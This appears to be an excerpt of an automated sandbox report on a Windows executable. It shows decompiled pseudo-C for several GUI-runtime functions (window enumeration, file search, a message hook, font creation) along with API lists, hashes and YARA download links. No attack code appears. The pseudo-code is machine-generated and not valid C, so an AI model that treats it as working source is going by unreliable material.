					if(_t35 != 0) {
						_push(0xffffffff);
						_push(_t36);
						_t21 = E00420244(_t32);
						_push(_t21);
						L00406BD8();
						return _t21;
					}
				}
				return _t11;
			}

0x0042279c
0x004227a3
0x004227a6
0x004227a8
0x004227ae
0x004227b7
0x004227b9
0x004227bd
0x004227bf
0x004227c1
0x004227c4
0x004227c9
0x004227ca
0x004227cf
0x004227d8
0x004227d9
0x004227d9
0x004227e9
0x004227ea
0x004227eb
0x004227ec
0x004227ed
0x004227ee
0x004227ef
0x004227f3
0x0042280b
0x00422812
0x00422814
0x00422816
0x00422819
0x0042281e
0x0042281f
0x00000000
0x0042281f
0x00422812
0x0042282b

APIs

72E7B410.GDI32(00000000,00000000,000000FF), ref: 004227CA
72E7B150.GDI32(00000000,00000000,00000000,000000FF), ref: 004227D9
PlayEnhMetaFile.GDI32(00000000,?,?), ref: 0042280B
72E7B410.GDI32(00000000,00000000,000000FF,00000000,?,?), ref: 0042281F

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: B410$B150FileMetaPlay
String ID:
API String ID: 1962039817-0
Opcode ID: adaabdb13db3a79d74395043d3c6f4e32a5a58512b4d06553c5b570f95143df9
Instruction ID: 8b19685dd080d5bd29b8e3ba5c72af2b4bac0d11ef18940f13b25e7baf33f4e2
Opcode Fuzzy Hash: adaabdb13db3a79d74395043d3c6f4e32a5a58512b4d06553c5b570f95143df9
Instruction Fuzzy Hash: 6701A5B17042306BC711BA699C8885FB3ED9F85334B45076BB818EB382DA78EC0086E5

Uniqueness

Uniqueness Score: -1.00%

Function 00457C54, Relevance: 6.1, APIs: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00457C54(void* __eax, void* __ecx, char __edx) {
				char _v12;
				struct HWND__* _v20;
				int _t17;
				void* _t27;
				struct HWND__* _t33;
				void* _t35;
				void* _t36;
				long _t37;

				_t37 = _t36 + 0xfffffff8;
				_t27 = __eax;
				_t17 =  *0x48fbfc; // 0x21d1310
				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
						_v12 = __edx;
						EnumWindows(E00457BE4, _t37);
						_t5 = _t27 + 0x90; // 0x0
						_t17 =  *_t5;
						if( *((intOrPtr*)(_t17 + 8)) != 0) {
							_t33 = GetWindow(_v20, 3);
							_v20 = _t33;
							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
								_v20 = 0xfffffffe;
							}
							_t10 = _t27 + 0x90; // 0x0
							_t17 =  *_t10;
							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
							if(_t35 >= 0) {
								do {
									_t13 = _t27 + 0x90; // 0x0
									_t17 = SetWindowPos(E004140D0( *_t13, _t35), _v20, 0, 0, 0, 0, 0x213);
									_t35 = _t35 - 1;
								} while (_t35 != 0xffffffff);
							}
						}
					}
					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
				}
				return _t17;
			}

0x00457c56
0x00457c59
0x00457c5b
0x00457c64
0x00457c71
0x00457c7a
0x00457c7d
0x00457c89
0x00457c8e
0x00457c8e
0x00457c98
0x00457ca6
0x00457ca8
0x00457cb5
0x00457cb7
0x00457cb7
0x00457cbe
0x00457cbe
0x00457cc7
0x00457ccb
0x00457ccd
0x00457ce1
0x00457ced
0x00457cf2
0x00457cf3
0x00457ccd
0x00457ccb
0x00457c98
0x00457cf8
0x00457cf8
0x00457d02

APIs

EnumWindows.USER32(00457BE4), ref: 00457C89
GetWindow.USER32(00000003,00000003), ref: 00457CA1
GetWindowLongA.USER32 ref: 00457CAE
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 00457CED

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$EnumLongWindows
String ID:
API String ID: 4191631535-0
Opcode ID: 5837f7ba724a181cafce3f75d663f5c85bdaa1754f31eab1de7ce17710d96d61
Instruction ID: 9bd6c767c6febb2a3f0accd41cfd350b3a3ee52f636edb9722bae87866f451f4
Opcode Fuzzy Hash: 5837f7ba724a181cafce3f75d663f5c85bdaa1754f31eab1de7ce17710d96d61
Instruction Fuzzy Hash: 57115E30608210AFD711EA29E885F9A77D4AB05765F15027AFD68AF2D3C3789C84C759

Uniqueness

Uniqueness Score: -1.00%

Function 004088D4, Relevance: 6.0, APIs: 4, Instructions: 39
timefileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004088D4(WORD* __eax) {
				struct _FILETIME _v12;
				long _t20;
				WORD* _t30;
				void* _t35;
				struct _FILETIME* _t36;

				_t36 = _t35 + 0xfffffff8;
				_t30 = __eax;
				while((_t30[0xc].dwFileAttributes & _t30[8]) != 0) {
					if(FindNextFileA(_t30[0xa],  &(_t30[0xc])) != 0) {
						continue;
					} else {
						_t20 = GetLastError();
					}
					L5:
					return _t20;
				}
				FileTimeToLocalFileTime( &(_t30[0x16]), _t36);
				FileTimeToDosDateTime( &_v12,  &(_t30[1]), _t30);
				_t30[2] = _t30[0x1c];
				_t30[4] = _t30[0xc].dwFileAttributes;
				E00404588( &(_t30[6]), 0x104,  &(_t30[0x22]));
				_t20 = 0;
				goto L5;
			}

0x004088d5
0x004088d8
0x004088f4
0x004088eb
0x00000000
0x004088ed
0x004088ed
0x004088ed
0x00408933
0x00408936
0x00408936
0x00408901
0x00408910
0x00408918
0x0040891e
0x0040892c
0x00408931
0x00000000

APIs

FindNextFileA.KERNEL32(?,?), ref: 004088E4
GetLastError.KERNEL32(?,?), ref: 004088ED
FileTimeToLocalFileTime.KERNEL32(?), ref: 00408901
FileTimeToDosDateTime.KERNEL32 ref: 00408910

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: FileTime$DateErrorFindLastLocalNext
String ID:
API String ID: 2103556486-0
Opcode ID: 55f3200e7f87359629114914a74fd0bdb901e704791539bb3e52001bb53133f2
Instruction ID: b2e1fed48c8f422ee2b5e5743327b4e038b85d2b22b747623e64466df017a0cf
Opcode Fuzzy Hash: 55f3200e7f87359629114914a74fd0bdb901e704791539bb3e52001bb53133f2
Instruction Fuzzy Hash: B5F06DB25002009FCB44FFA5C9C288733ACEB4831075084BBAD05EB28BEA38E55587A9

Uniqueness

Uniqueness Score: -1.00%

Function 00457570, Relevance: 6.0, APIs: 4, Instructions: 34
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00457570(void* __ecx) {
				void* _t2;
				DWORD* _t7;

				_t2 =  *0x48fbfc; // 0x21d1310
				if( *((char*)(_t2 + 0xa5)) == 0) {
					if( *0x48fc14 == 0) {
						_t2 = SetWindowsHookExA(3, E0045752C, 0, GetCurrentThreadId());
						 *0x48fc14 = _t2;
					}
					if( *0x48fc10 == 0) {
						_t2 = CreateEventA(0, 0, 0, 0);
						 *0x48fc10 = _t2;
					}
					if( *0x48fc18 == 0) {
						_t2 = CreateThread(0, 0x3e8, E004574D0, 0, 0, _t7);
						 *0x48fc18 = _t2;
					}
				}
				return _t2;
			}

0x00457571
0x0045757d
0x00457586
0x00457598
0x0045759d
0x0045759d
0x004575a9
0x004575b3
0x004575b8
0x004575b8
0x004575c4
0x004575d7
0x004575dc
0x004575dc
0x004575c4
0x004575e2

APIs

GetCurrentThreadId.KERNEL32 ref: 00457588
SetWindowsHookExA.USER32 ref: 00457598
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004575B3
CreateThread.KERNEL32(00000000,000003E8,004574D0,00000000,00000000), ref: 004575D7

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateThread$CurrentEventHookWindows
String ID:
API String ID: 1195359707-0
Opcode ID: c5de43db9f6cbb411724523a7b88322c2eed72ad72aa3c98ac46cf96fd0177d3
Instruction ID: 5d711aba6c396b4f3788007058525e9a7d610057fcd7099d041e4e76e9cb2673
Opcode Fuzzy Hash: c5de43db9f6cbb411724523a7b88322c2eed72ad72aa3c98ac46cf96fd0177d3
Instruction Fuzzy Hash: 08F030B0A89308BEF7106725BD06F1A3554B311B06F60543EFE056D1D2D7B817E8879D

Uniqueness

Uniqueness Score: -1.00%

Function 00407224, Relevance: 6.0, APIs: 4, Instructions: 11
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407224(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}

0x00407227
0x0040722e
0x00407233
0x00407239
0x0040723e

APIs

GlobalHandle.KERNEL32 ref: 00407227
GlobalUnWire.KERNEL32 ref: 0040722E
GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00407233
GlobalFix.KERNEL32 ref: 00407239

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocHandleWire
String ID:
API String ID: 2210401237-0
Opcode ID: bbb00e0be71c8f6aa3260edcd61b9b76f434907876f5cb2297e6b668732544bd
Instruction ID: ab20af19cc851b5b57b0214bf18fc3e810406dd13a077be7de484e3b879df495
Opcode Fuzzy Hash: bbb00e0be71c8f6aa3260edcd61b9b76f434907876f5cb2297e6b668732544bd
Instruction Fuzzy Hash: 44B009E495020038E80433F24E0FE7B402C98907093824A7EB846F2882D87CA864443D

Uniqueness

Uniqueness Score: -1.00%

Function 00437244, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00437244(char __eax) {
				char _v5;
				char _v6;
				intOrPtr _v10;
				intOrPtr _v14;
				void* __ebx;
				void* __ebp;
				char _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				intOrPtr _t51;
				void* _t52;
				char _t53;
				struct HICON__* _t54;
				intOrPtr _t59;
				intOrPtr _t63;
				intOrPtr* _t67;
				intOrPtr _t69;
				void* _t70;
				intOrPtr _t73;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr _t87;
				intOrPtr* _t93;
				void* _t96;
				intOrPtr _t100;
				intOrPtr _t107;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t119;
				intOrPtr _t120;
				intOrPtr _t126;
				intOrPtr _t128;
				void* _t130;
				void* _t131;
				void* _t133;
				void* _t135;
				intOrPtr _t136;

				_t44 = __eax;
				_t133 = _t135;
				_t136 = _t135 + 0xfffffff4;
				_v5 = __eax;
				_t93 = 0;
				_v6 = 0;
				if( *0x48fb84 == 0) {
					L34:
					return _t44;
				} else {
					_t44 =  *0x48fb84; // 0x0
					if( *((char*)(_t44 + 0x30)) != 0) {
						goto L34;
					} else {
						_push(_t133);
						_push(0x437510);
						_push( *[fs:edx]);
						 *[fs:edx] = _t136;
						_t45 =  *0x48fb84; // 0x0
						 *0x48fbb0 = _t45;
						_push(_t133);
						_push(0x43749e);
						_push( *[fs:edx]);
						 *[fs:edx] = _t136;
						_t46 =  *0x48fb84; // 0x0
						 *((char*)(_t46 + 0x30)) = 1;
						_t47 =  *0x48fb84; // 0x0
						 *((char*)(_t47 + 0x1c)) = _v5;
						_t107 =  *0x48fb8c; // 0x0
						E00436124(_t107);
						if( *0x48fba0 == 2) {
							_t87 =  *0x48fb84; // 0x0
							_t128 =  *0x433bf0; // 0x433c3c
							_t93 = E00403764(_t87, _t128);
							 *((char*)(_t93 + 0x6c)) =  *((intOrPtr*)( *_t93 + 0x34))() & 0xffffff00 |  *((intOrPtr*)(_t93 + 4)) == 0x00000000;
						}
						_t50 =  *0x48fb84; // 0x0
						if( *((intOrPtr*)(_t50 + 4)) == 0) {
							L7:
							_t51 =  *0x48fb84; // 0x0
							_v14 =  *((intOrPtr*)(_t51 + 0xc));
							_t109 =  *((intOrPtr*)(_t51 + 0x10));
							_v10 =  *((intOrPtr*)(_t51 + 0x10));
						} else {
							_t83 =  *0x48fb84; // 0x0
							_t126 =  *0x434730; // 0x43477c
							if(E00403740( *((intOrPtr*)(_t83 + 4)), _t126) == 0) {
								goto L7;
							} else {
								_t86 =  *0x48fb84; // 0x0
								_v14 =  *((intOrPtr*)(_t86 + 0x14));
								_t109 =  *((intOrPtr*)(_t86 + 0x18));
								_v10 =  *((intOrPtr*)(_t86 + 0x18));
							}
						}
						_t52 = E004371D0(_t133);
						_pop(_t96);
						if(_t52 == 0) {
							L14:
							_t53 = 0;
						} else {
							if( *0x48fba0 != 2 ||  *((char*)(_t93 + 0x6c)) == 0) {
								if( *0x48fba0 == 0) {
									goto L14;
								} else {
									E00436AFC(1);
									if(1 == 0) {
										goto L14;
									} else {
										goto L13;
									}
								}
							} else {
								L13:
								if(_v5 != 0) {
									_t53 = 1;
								} else {
									goto L14;
								}
							}
						}
						_v6 = _t53;
						if( *0x48fba0 != 2) {
							__eflags =  *0x48fba4;
							if(__eflags == 0) {
								_t54 =  *0x48fb98; // 0x0
								SetCursor(_t54);
							} else {
								_t73 =  *0x48fba4; // 0x0
								E00440E7C(_t73, _t109, __eflags);
							}
						} else {
							if(_v6 != 0 &&  *((char*)(_t93 + 0x6c)) != 0) {
								_t76 = E004500B0( *((intOrPtr*)(_t93 + 0x38)));
								if(_t76 != 0 &&  *((intOrPtr*)(_t76 + 0x220)) ==  *((intOrPtr*)(_t93 + 0x38))) {
									E00453D20(_t76, _t93, _t96, 0, _t130, _t131);
								}
								_t77 =  *0x48fb84; // 0x0
								_t78 =  *0x48fb80; // 0x0
								E00439EA4(_t78, 0, 0xb03a, _t77);
							}
						}
						 *0x48fb80 = 0;
						 *0x48fb84 = 0;
						if( *0x48fbb0 != 0) {
							_t69 =  *0x48fbb0; // 0x0
							if( *((intOrPtr*)(_t69 + 4)) != 0) {
								_t70 = 3;
								if(_v6 == 0) {
									_t70 = 4;
									_t119 =  *0x48fbb0; // 0x0
									 *((intOrPtr*)(_t119 + 0xc)) = 0;
									_t120 =  *0x48fbb0; // 0x0
									 *((intOrPtr*)(_t120 + 0x10)) = 0;
									_v14 = 0;
									_v10 = 0;
								}
								_t112 =  *0x48fbb0; // 0x0
								_t114 =  *0x48fbb0; // 0x0
								_t116 =  *0x48fbb0; // 0x0
								_t100 =  *0x48fbb0; // 0x0
								E004369E0( *((intOrPtr*)(_t116 + 8)), _t100, _t70, _t114 + 0xc,  *((intOrPtr*)(_t112 + 4)));
							}
						}
						_pop(_t110);
						 *[fs:eax] = _t110;
						_push(0x4374a5);
						_t59 =  *0x48fbac; // 0x0
						E004035B4(_t59);
						 *0x48fbac = 0;
						if( *0x48fbb0 != 0) {
							_t63 =  *0x48fbb0; // 0x0
							 *((char*)(_t63 + 0x30)) = 0;
							_t67 =  *0x48fbb0; // 0x0
							 *((intOrPtr*)( *_t67))(_v6, _v10);
						}
						 *0x48fb84 = 0;
						return 0;
					}
				}
			}

0x00437244
0x00437245
0x00437247
0x0043724b
0x0043724e
0x00437250
0x0043725b
0x00437517
0x0043751b
0x00437261
0x00437261
0x0043726a
0x00000000
0x00437270
0x00437272
0x00437273
0x00437278
0x0043727b
0x0043727e
0x00437283
0x0043728a
0x0043728b
0x00437290
0x00437293
0x00437296
0x0043729b
0x0043729f
0x004372a7
0x004372aa
0x004372b5
0x004372c1
0x004372c3
0x004372c8
0x004372d3
0x004372e3
0x004372e3
0x004372e6
0x004372ef
0x0043731b
0x0043731b
0x00437323
0x00437326
0x00437329
0x004372f1
0x004372f1
0x004372f9
0x00437306
0x00000000
0x00437308
0x00437308
0x00437310
0x00437313
0x00437316
0x00437316
0x00437306
0x0043732d
0x00437332
0x00437335
0x00437360
0x00437360
0x00437337
0x0043733e
0x0043734d
0x00000000
0x0043734f
0x00437351
0x00437358
0x00000000
0x00000000
0x00000000
0x00000000
0x00437358
0x0043735a
0x0043735a
0x0043735e
0x00437364
0x00000000
0x00000000
0x00000000
0x0043735e
0x0043733e
0x00437366
0x00437370
0x004373b5
0x004373bc
0x004373ca
0x004373d0
0x004373be
0x004373be
0x004373c3
0x004373c3
0x00437372
0x00437376
0x00437381
0x00437388
0x00437397
0x00437397
0x0043739c
0x004373a9
0x004373ae
0x004373ae
0x00437376
0x004373d7
0x004373de
0x004373ea
0x004373ec
0x004373f5
0x004373f7
0x004373fd
0x004373ff
0x00437401
0x00437409
0x0043740c
0x00437414
0x00437419
0x0043741e
0x0043741e
0x00437421
0x0043742b
0x00437435
0x0043743e
0x00437445
0x00437445
0x004373f5
0x0043744c
0x0043744f
0x00437452
0x00437457
0x0043745c
0x00437463
0x0043746f
0x00437471
0x00437476
0x0043748d
0x00437494
0x00437494
0x00437498
0x0043749d
0x0043749d
0x0043726a

APIs

Part of subcall function 00436124: ReleaseCapture.USER32(00000000,004372BA,00000000,0043749E,?,00000000,00437510,?,00000001), ref: 00436127

SetCursor.USER32(00000000,00000000,0043749E,?,00000000,00437510,?,00000001), ref: 004373D0

Part of subcall function 00440E7C: 73451770.COMCTL32(00000000,?,00436D95), ref: 00440E98
Part of subcall function 00440E7C: ShowCursor.USER32(000000FF,00000000,?,00436D95), ref: 00440EB3

Strings

|GC, xrefs: 004372F9
<<C, xrefs: 004372C8

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor$73451770CaptureReleaseShow
String ID: <<C$|GC
API String ID: 253480221-3155334562
Opcode ID: 5df990364465969901304e1b29b66484120dc796d59716d242e3edc6ecfbf381
Instruction ID: 686fcaf825e4e13a299f6afb46c2b8e7626cb9d1648d8efe1c0b847c8351f824
Opcode Fuzzy Hash: 5df990364465969901304e1b29b66484120dc796d59716d242e3edc6ecfbf381
Instruction Fuzzy Hash: BE719FB5618240DFD724CF69D8A5B5A7BF1BB8C354F44D8BED8408B362D338A949DB08

Uniqueness

Uniqueness Score: -1.00%

Function 0043700C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0043700C(intOrPtr __eax, intOrPtr __ecx, intOrPtr __edx, void* __fp0) {
				intOrPtr _v8;
				intOrPtr* _v12;
				struct tagPOINT _v20;
				intOrPtr _v24;
				char _v28;
				char _v36;
				void* __edi;
				void* __ebp;
				intOrPtr _t54;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t71;
				intOrPtr _t74;
				intOrPtr _t88;
				intOrPtr _t105;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t120;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr _t129;
				void* _t133;
				intOrPtr _t134;
				void* _t137;

				_t137 = __fp0;
				_v8 = __ecx;
				_t88 = __edx;
				_t124 = __eax;
				 *0x48fb80 = __eax;
				_push(_t133);
				_push(0x4371b1);
				_push( *[fs:edx]);
				 *[fs:edx] = _t134;
				_v12 = 0;
				 *0x48fb88 = 0;
				_t135 =  *((char*)(__eax + 0x9b));
				if( *((char*)(__eax + 0x9b)) != 0) {
					E004037B0(__eax, __eflags);
					__eflags =  *0x48fb80;
					if( *0x48fb80 != 0) {
						__eflags = _v12;
						if(_v12 == 0) {
							_v12 = E004363E8(1, _t124);
							 *0x48fb88 = 1;
						}
						_t128 =  *((intOrPtr*)(_v12 + 0x38));
						_t105 =  *0x434e14; // 0x434e60
						_t54 = E00403740( *((intOrPtr*)(_v12 + 0x38)), _t105);
						__eflags = _t54;
						if(_t54 == 0) {
							_t129 =  *((intOrPtr*)(_v12 + 0x38));
							__eflags =  *((intOrPtr*)(_t129 + 0x30));
							if( *((intOrPtr*)(_t129 + 0x30)) != 0) {
								L14:
								__eflags = 0;
								E00412A88(0,  &_v36, 0);
								E004387D4(_t129,  &_v28,  &_v36);
								_t60 = _v12;
								 *((intOrPtr*)(_t60 + 0x44)) = _v28;
								 *((intOrPtr*)(_t60 + 0x48)) = _v24;
								L15:
								__eflags =  *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48));
								E00412A88( *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48)),  &_v28,  *((intOrPtr*)(_v12 + 0x48)) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x4c)));
								_t65 = _v12;
								 *((intOrPtr*)(_t65 + 0x4c)) = _v28;
								 *((intOrPtr*)(_t65 + 0x50)) = _v24;
								goto L16;
							}
							_t116 =  *0x434e14; // 0x434e60
							_t71 = E00403740(_t129, _t116);
							__eflags = _t71;
							if(_t71 != 0) {
								goto L14;
							}
							GetCursorPos( &_v20);
							_t74 = _v12;
							 *(_t74 + 0x44) = _v20.x;
							 *((intOrPtr*)(_t74 + 0x48)) = _v20.y;
							goto L15;
						} else {
							GetWindowRect(E0043F370(_t128), _v12 + 0x44);
							L16:
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							L17:
							E00436E9C(_v12, _v8, _t88, _t133, _t137);
							_pop(_t115);
							 *[fs:eax] = _t115;
							return 0;
						}
					}
					_pop(_t120);
					 *[fs:eax] = _t120;
					return 0;
				}
				E004037B0(__eax, _t135);
				if( *0x48fb80 != 0) {
					__eflags = _v12;
					if(_v12 == 0) {
						_v12 = E004362D0(_t124, 1);
						 *0x48fb88 = 1;
					}
					goto L17;
				}
				_pop(_t123);
				 *[fs:eax] = _t123;
				return 0;
			}

0x0043700c
0x00437015
0x00437018
0x0043701a
0x0043701c
0x00437024
0x00437025
0x0043702a
0x0043702d
0x00437032
0x00437035
0x0043703c
0x00437043
0x00437099
0x0043709e
0x004370a5
0x004370b4
0x004370b8
0x004370c8
0x004370cb
0x004370cb
0x004370d5
0x004370da
0x004370e0
0x004370e5
0x004370e7
0x00437105
0x00437108
0x0043710c
0x00437139
0x0043713e
0x00437140
0x0043714d
0x00437152
0x00437158
0x0043715e
0x00437161
0x00437173
0x00437179
0x0043717e
0x00437184
0x0043718a
0x00000000
0x0043718a
0x00437110
0x00437116
0x0043711b
0x0043711d
0x00000000
0x00000000
0x00437123
0x00437128
0x0043712e
0x00437134
0x00000000
0x004370e9
0x004370f8
0x0043718d
0x00437196
0x00437197
0x00437198
0x00437199
0x0043719a
0x004371a2
0x004371a9
0x004371ac
0x00000000
0x004371ac
0x004370e7
0x004370a9
0x004370ac
0x00000000
0x004370ac
0x0043704e
0x0043705a
0x00437069
0x0043706d
0x00437081
0x00437084
0x00437084
0x00000000
0x0043706d
0x0043705e
0x00437061
0x00000000

Strings

`NC, xrefs: 004370DA, 00437110

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: `NC
API String ID: 0-918118547
Opcode ID: 1b16747acd1b17efe7daa8821fdcd99be8489570ab319eef6596d1cb0d868ad7
Instruction ID: aaebfc5350d81313ac95865dd7c310d1e1bc178e180e2a18a4a74c2a203f4d4a
Opcode Fuzzy Hash: 1b16747acd1b17efe7daa8821fdcd99be8489570ab319eef6596d1cb0d868ad7
Instruction Fuzzy Hash: F051B4B5A046099FCB10CF99D881A9EBBF5FF8C314F1090AAE840A7351D779AD85CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041EFE0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041EFE0(void* __eax, void* __ebx, void* __ecx) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _t76;
				intOrPtr _t81;
				void* _t107;
				void* _t116;
				intOrPtr _t126;
				void* _t137;
				void* _t138;
				intOrPtr _t139;

				_t137 = _t138;
				_t139 = _t138 + 0xffffffb4;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_t116 = __eax;
				_push(_t137);
				_push(0x41f169);
				_push( *[fs:eax]);
				 *[fs:eax] = _t139;
				_v8 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(_v8 + 8)) != 0) {
					 *[fs:eax] = 0;
					_push(E0041F170);
					return E00404344( &_v80, 3);
				} else {
					_t76 =  *0x48fa74; // 0x21d0ad8
					E0041E364(_t76);
					_push(_t137);
					_push(0x41f141);
					_push( *[fs:eax]);
					 *[fs:eax] = _t139;
					if( *((intOrPtr*)(_v8 + 8)) == 0) {
						_v68.lfHeight =  *(_v8 + 0x14);
						_v68.lfWidth = 0;
						_v68.lfEscapement = 0;
						_v68.lfOrientation = 0;
						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
							_v68.lfWeight = 0x190;
						} else {
							_v68.lfWeight = 0x2bc;
						}
						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
						E0040457C( &_v72, _v8 + 0x1b);
						if(E00408598(_v72, "Default") != 0) {
							E0040457C( &_v80, _v8 + 0x1b);
							E00408C10( &(_v68.lfFaceName), _v80);
						} else {
							E0040457C( &_v76, "\rMS Sans Serif");
							E00408C10( &(_v68.lfFaceName), _v76);
						}
						_v68.lfQuality = 0;
						_v68.lfOutPrecision = 0;
						_v68.lfClipPrecision = 0;
						_t107 = E0041F2C4(_t116) - 1;
						if(_t107 == 0) {
							_v68.lfPitchAndFamily = 2;
						} else {
							if(_t107 == 1) {
								_v68.lfPitchAndFamily = 1;
							} else {
								_v68.lfPitchAndFamily = 0;
							}
						}
						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
					}
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(0x41f148);
					_t81 =  *0x48fa74; // 0x21d0ad8
